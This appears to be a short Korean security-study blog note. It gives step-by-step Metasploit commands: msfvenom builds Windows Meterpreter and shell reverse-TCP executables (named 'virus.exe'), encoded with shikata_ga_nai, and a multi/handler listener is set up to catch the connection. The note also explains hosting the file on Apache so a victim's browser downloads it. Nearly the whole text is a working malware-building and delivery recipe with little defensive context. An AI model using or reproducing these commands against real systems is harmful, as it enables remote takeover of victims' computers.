1. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.0 lport=444 -f exe -o virus.exe
2.핸들러 : 파일 생성 -> leafpad handler.rc 안의 내용
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.0
set lport 4444
exploit
3.service apache2 start 후 /var/www/html 에 msfvenom 한 바이러스를 넣어줄시
해당 피해자 컴퓨터 브라우저 주소창에 해커 아이피주소/바이러스파일명.exe 입력시 다운이 받아진다.
4.쉘 악성코드 생성 : msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp lhost=192.168.0.0 lport=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o output.exe
-a는 어느 아키텍처를 사용할 것인가 -b는 인코딩하는데 이 캐릭터는 무시해라 [공백문자] -e는 인코딩 -f는 파일타입 -o는 아웃풋 파일명
'8. 정보보안 노트 정리' 카테고리의 다른 글
랜섬웨어 예방법 - 그룹 보안정책 설정 (0) | 2023.12.27 |
---|---|
RAT(Remote Access Trojan) 툴 pupy 설치하기 (0) | 2023.12.26 |
PentesterLab [해킹 실습용 웹사이트 구성] (0) | 2023.12.26 |
Path Traversal[경로순회 취약점] snort 룰 (0) | 2023.12.26 |
Security Onion -> OWASP Zap XSS 등 보안규칙 적용[http_uri,http_client_body 옵션] (0) | 2023.12.26 |